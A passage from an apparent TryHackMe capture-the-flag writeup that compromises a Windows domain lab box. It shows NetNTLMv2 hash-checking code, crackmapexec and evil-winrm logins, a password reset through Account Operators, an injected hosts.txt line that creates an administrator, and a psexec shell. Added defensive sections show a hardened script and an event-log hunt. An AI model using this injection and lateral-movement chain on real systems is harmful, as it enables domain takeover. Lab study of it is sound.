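            for i, j in enumerate(order):
                a, b, c, d = d, rol((a + fn(b, c, d) + x[j] + k) & MASK, shifts[i % 4]), b, c
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NTOWFv1 (MS-NLMP 3.3.1): MD4 over the UTF-16LE password."""
    return md4(password.encode("utf-16-le"))


def parse_netntlmv2(line: str) -> dict:
    """Split a 'user::domain:ServerChallenge:NTProofStr:blob' line into its MS-NLMP fields."""
    user, _, domain, chal_hex, proof_hex, blob_hex = line.strip().split(":")
    blob = bytes.fromhex(blob_hex)
    # blob = RespType(1) HiRespType(1) Reserved(6) TimeStamp(8) ClientChallenge(8) Reserved(4) AvPairs
    filetime = struct.unpack_from("<Q", blob, 8)[0]
    av_pairs, pos = {}, 28
    while pos + 4 <= len(blob):
        av_id, av_len = struct.unpack_from("<HH", blob, pos)
        value = blob[pos + 4:pos + 4 + av_len]
        pos += 4 + av_len
        if av_id == 0:                    # MsvAvEOL terminates the list
            break
        name = AV_IDS.get(av_id, f"AvId{av_id}")
        av_pairs[name] = value.decode("utf-16-le") if av_id in NAME_AV_IDS else value.hex()
    return {
        "user": user, "domain": domain,
        "server_challenge": bytes.fromhex(chal_hex), "nt_proof": bytes.fromhex(proof_hex),
        "blob": blob, "client_challenge": blob[16:24].hex(),
        "timestamp": FILETIME_EPOCH + timedelta(microseconds=filetime // 10),
        "av_pairs": av_pairs,
    }


def rogue_server_indicators(rec: dict) -> list:
    """AV pairs carrying one of Responder's default names. The victim's client copied them
    from the CHALLENGE, so they name the host the user really authenticated to."""
    return sorted(k for k, v in rec["av_pairs"].items() if v in RESPONDER_DEFAULT_NAMES)


def check_password(rec: dict, candidate: str) -> bool:
    """Recompute NTProofStr (MS-NLMP 3.3.2) for one candidate, which is all john does per
    guess: a captured exchange is as good as the password whenever the password is weak."""
    ident = (rec["user"].upper() + rec["domain"]).encode("utf-16-le")
    ntlmv2_key = hmac.new(nt_hash(candidate), ident, hashlib.md5).digest()
    proof = hmac.new(ntlmv2_key, rec["server_challenge"] + rec["blob"], hashlib.md5).digest()
    return hmac.compare_digest(proof, rec["nt_proof"])


if __name__ == "__main__":
    rec = parse_netntlmv2(CAPTURED)
    print(rec["domain"] + "\\" + rec["user"], rec["timestamp"].isoformat(), rec["av_pairs"])
    print("Responder default names in target info:", rogue_server_indicators(rec))
```

The decoded timestamp is the victim client's own clock, so it also tells you when the poisoned request was made, independent of Responder's log.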

We successfully cracked buse’s password. Let’s check with crackmapexec whether we can psexec or WinRM into the box.

┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]
└─$ crackmapexec smb windcorp.thm  -u buse -p 'uzunLM+3131'         
SMB         10.10.226.131   445    FIRE             [*] Windows 10.0 Build 17763 (name:FIRE) (domain:windcorp.thm) (signing:True) (SMBv1:False)
SMB         10.10.226.131   445    FIRE             [+] windcorp.thm\buse:uzunLM+3131 
                                                                                                                                     
┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]
└─$ crackmapexec winrm windcorp.thm  -u buse -p 'uzunLM+3131' 
WINRM       10.10.226.131   5985   FIRE             [*] http://10.10.226.131:5985/wsman
WINRM       10.10.226.131   5985   FIRE             [+] WINDCORP\buse:uzunLM+3131 (Pwn3d!)

crackmapexec says Pwn3d! for winrm, which means we can use Evil-WinRM to get a shell on the box.

┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]
└─$ evil-winrm -i windcorp.thm -u buse -p 'uzunLM+3131'              

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\buse\Documents> whoami
windcorp\buse
*Evil-WinRM* PS C:\Users\buse\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\buse\Desktop> dir


    Directory: C:\Users\buse\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         5/7/2020   3:00 AM                Also stuff
d-----         5/7/2020   2:58 AM                Stuff
-a----         5/2/2020  11:53 AM             45 Flag 2.txt
-a----         5/1/2020   8:33 AM             37 Notes.txt


*Evil-WinRM* PS C:\Users\buse\Desktop> type "Flag 2.txt"
THM{6f690fc72b******************************}

Privilege Escalation

First we check which groups the user buse is part of and whether we have any special privileges.

*Evil-WinRM* PS C:\users> whoami /all

USER INFORMATION
----------------

User Name     SID
============= ============================================
windcorp\buse S-1-5-21-555431066-3599073733-176599750-5777


GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                          Attributes
=========================================== ================ ============================================ ==================================================
Everyone                                    Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Account Operators                   Alias            S-1-5-32-548                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users                Alias            S-1-5-32-555                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group
WINDCORP\IT                                 Group            S-1-5-21-555431066-3599073733-176599750-5865 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

We see that we are part of the Account Operators group, which means we can modify all accounts except administrator accounts. Then, on checking different directories, we find a C:\scripts directory containing a checkservers.ps1 PowerShell script; running it shows that it reads "C:\Users\brittanycr\hosts.txt", and log.txt shows the script is being run automatically.

*Evil-WinRM* PS C:\scripts> dir


    Directory: C:\scripts


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         5/3/2020   5:53 AM           4119 checkservers.ps1
-a----       11/14/2020  10:14 AM             31 log.txt


*Evil-WinRM* PS C:\scripts> type log.txt
Last run: 11/14/2020 10:15:03
*Evil-WinRM* PS C:\scripts> .\checkservers.ps1
11/14/2020 10:15:16 AM
Access is denied
At C:\scripts\checkservers.ps1:25 char:1
+ get-content C:\Users\brittanycr\hosts.txt | Where-Object {!($_ -match ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (C:\Users\brittanycr\hosts.txt:String) [Get-Content], UnauthorizedAccessException
    + FullyQualifiedErrorId : ItemExistsUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommand
Cannot find path 'C:\Users\brittanycr\hosts.txt' because it does not exist.
At C:\scripts\checkservers.ps1:25 char:1
+ get-content C:\Users\brittanycr\hosts.txt | Where-Object {!($_ -match ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\Users\brittanycr\hosts.txt:String) [Get-Content], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
Last run: 11/14/2020 10:15:17
Access to the path 'C:\scripts\log.txt' is denied.
At C:\scripts\checkservers.ps1:81 char:1
+ Set-Content -Path C:\scripts\log.txt -Value $log
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Set-Content], UnauthorizedAccessException
    + FullyQualifiedErrorId : System.UnauthorizedAccessException,Microsoft.PowerShell.Commands.SetContentCommand
Available count: 0
Not available count: 0
Not available hosts:

Sleeping 45 seconds
11/14/2020 10:16:02 AM

Since we are part of the Account Operators group let’s reset the password for the account “brittanycr”.

*Evil-WinRM* PS C:\scripts> net user brittanycr hello123#
The command completed successfully.

*Evil-WinRM* PS C:\scripts>

So now let's edit that hosts.txt file to create a new Admin user!

┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]
└─$ crackmapexec smb windcorp.thm -u brittanycr -p 'hello123#'
SMB         10.10.226.131   445    FIRE             [*] Windows 10.0 Build 17763 (name:FIRE) (domain:windcorp.thm) (signing:True) (SMBv1:False)
SMB         10.10.226.131   445    FIRE             [+] windcorp.thm\brittanycr:hello123# 
                                                                                                                                     
┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]
└─$ crackmapexec winrm windcorp.thm -u brittanycr -p 'hello123#'
WINRM       10.10.226.131   5985   FIRE             [*] http://10.10.226.131:5985/wsman
WINRM       10.10.226.131   5985   FIRE             [-] WINDCORP\brittanycr:hello123# "Failed to authenticate the user brittanycr with ntlm"

It seems we can't psexec or winrm into the box as brittanycr. Let's use smbclient to upload our malicious hosts.txt file.

┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]
└─$ smbclient -U 'brittanycr' //windcorp.thm/Users 
Enter WORKGROUP\brittanycr's password: 
Try "help" to get a list of possible commands.
smb: \> cd brittanycr\
smb: \brittanycr\> dir
  .                                   D        0  Sun May  3 05:06:46 2020
  ..                                  D        0  Sun May  3 05:06:46 2020
  hosts.txt                           A       22  Sun May  3 19:14:57 2020

                15587583 blocks of size 4096. 10891432 blocks available

Let’s make our malicious hosts.txt file:

net user sid hello!123 /add;net localgroup Administrators sid /add

Now let's upload it using smbclient.

smb: \brittanycr\> put hosts.txt
putting file hosts.txt as \brittanycr\hosts.txt (0.2 kb/s) (average 0.2 kb/s)
smb: \brittanycr\> exit
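For the defender's side of this step, here is an added example, not the box's own checkservers.ps1 (whose source is not shown in this writeup). It assumes the script's weakness is that each line of hosts.txt ends up in a command string that gets evaluated, which is what the `net user ...;net localgroup ...` line above exploits, and shows that pattern beside a version that validates each line as a hostname or IP and never evaluates it.

```powershell
# Added example, not the box's checkservers.ps1. Assumption: the vulnerable
# script splices each hosts.txt line into a command string and evaluates it.

$HostsFile = 'C:\Users\brittanycr\hosts.txt'   # path taken from the error output above

# Unsafe pattern: the file line is spliced into a string that is then run, so
# everything after ';' executes as a separate command with the script's rights.
function Test-HostsUnsafe {
    Get-Content -LiteralPath $HostsFile | ForEach-Object {
        Invoke-Expression "Test-Connection -ComputerName $_ -Count 1 -Quiet"
    }
}

# Hardened pattern: each line must parse as an IP address or match a strict
# hostname grammar, and is then passed as a typed argument, never evaluated.
$HostPattern = '^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$'

function Test-HostsSafe {
    $available = @(); $unavailable = @(); $rejected = @()
    foreach ($line in Get-Content -LiteralPath $HostsFile) {
        $h = $line.Trim()
        if ($h -eq '' -or $h.StartsWith('#')) { continue }
        $ip = $null
        if (-not [System.Net.IPAddress]::TryParse($h, [ref]$ip) -and $h -notmatch $HostPattern) {
            $rejected += $h      # an injected "net user ... ;net localgroup ..." line lands here
            continue
        }
        if (Test-Connection -ComputerName $h -Count 1 -Quiet -ErrorAction SilentlyContinue) {
            $available += $h
        } else {
            $unavailable += $h
        }
    }
    [pscustomobject]@{ Available = $available; NotAvailable = $unavailable; Rejected = $rejected }
}

# Same summary format as the scheduled script's output, plus the rejected lines.
$result = Test-HostsSafe
"Available count: $($result.Available.Count)"
"Not available count: $($result.NotAvailable.Count)"
if ($result.Rejected.Count) { "Rejected (not a hostname/IP): $($result.Rejected -join ', ')" }
```

Validation closes the injection, but the other weakness here, a member of Account Operators being able to reset the password of the account whose file the scheduled script trusts, is an AD hardening issue (keep Account Operators membership minimal) rather than a script fix.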

Let's verify whether it worked; we can use crackmapexec for this.

┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]
└─$ crackmapexec smb windcorp.thm -u sid -p 'hello!123'
SMB         10.10.226.131   445    FIRE             [*] Windows 10.0 Build 17763 (name:FIRE) (domain:windcorp.thm) (signing:True) (SMBv1:False)
SMB         10.10.226.131   445    FIRE             [+] windcorp.thm\sid:hello!123 (Pwn3d!)
                                                                                                                                     
┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]
└─$ python3 /usr/share/doc/python3-impacket/examples/psexec.py  sid@windcorp.thm          
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

Password:
[*] Requesting shares on windcorp.thm.....
[*] Found writable share ADMIN$
[*] Uploading file cfKhdeUq.exe
[*] Opening SVCManager on windcorp.thm.....
[*] Creating service TNal on windcorp.thm.....
[*] Starting service TNal.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1158]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd c:\users\Administrator\Desktop
 
c:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 84E1-0562

 Directory of c:\Users\Administrator\Desktop

05/10/2020  03:17 AM    <DIR>          .
05/10/2020  03:17 AM    <DIR>          ..
05/07/2020  12:22 AM                47 Flag3.txt
               1 File(s)             47 bytes
               2 Dir(s)  44,605,804,544 bytes free

c:\Users\Administrator\Desktop>type "Flag3.txt"
THM{ba3a2bff2e******************************}

c:\Users\Administrator\Desktop>
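From the defender's side, the whole chain above leaves a trail in the Security log: a password reset (event 4724, buse resetting brittanycr), then a user creation (4720) and an addition to the Administrators group (4732) performed by the account that was just reset. This is an added hunting example, not part of the writeup; it assumes it is run on the domain controller by an account that can read the Security log, and the one-hour correlation window is an arbitrary choice.

```powershell
# Added example (not from the writeup). Correlates 4724 -> 4720/4732 so that an
# account whose password was reset by someone else and which then creates users
# or changes group membership within an hour is flagged.

$Since = (Get-Date).AddHours(-24)   # assumed lookback window

# Pull the EventData fields out of a record's XML into a hashtable.
function Get-EventFields {
    param([System.Diagnostics.Eventing.Reader.EventLogRecord]$Event)
    $x = [xml]$Event.ToXml()
    $d = @{}
    foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = [string]$n.'#text' }
    $d
}

$events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4724, 4720, 4732; StartTime = $Since } -ErrorAction SilentlyContinue |
    Sort-Object TimeCreated

$resets  = @()   # 4724: SubjectUserName reset the password of TargetUserName
$changes = @()   # 4720: user created; 4732: MemberSid added to group TargetUserName
foreach ($e in $events) {
    $f = Get-EventFields $e
    $rec = [pscustomobject]@{
        Time   = $e.TimeCreated
        Id     = $e.Id
        Actor  = $f['SubjectUserName']
        Target = $f['TargetUserName']
        Member = $f['MemberSid']       # only populated for 4732
    }
    if ($e.Id -eq 4724) { $resets += $rec } else { $changes += $rec }
}

# Flag resets that are followed by admin-type changes made under the reset account.
foreach ($r in $resets) {
    if ($r.Actor -eq $r.Target) { continue }   # self-service password change, not the pattern
    $follow = $changes | Where-Object {
        $_.Actor -eq $r.Target -and $_.Time -gt $r.Time -and $_.Time -le $r.Time.AddHours(1)
    }
    if ($follow) {
        "[!] $($r.Time) $($r.Actor) reset the password of $($r.Target); that account then:"
        foreach ($c in $follow) {
            $what = if ($c.Id -eq 4720) { "created user $($c.Target)" } else { "added $($c.Member) to group $($c.Target)" }
            "    $($c.Time) event $($c.Id): $what"
        }
    }
}
```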

And that was the box, hope you liked my writeup and learned something new :D

This post is licensed under CC BY 4.0 by the author.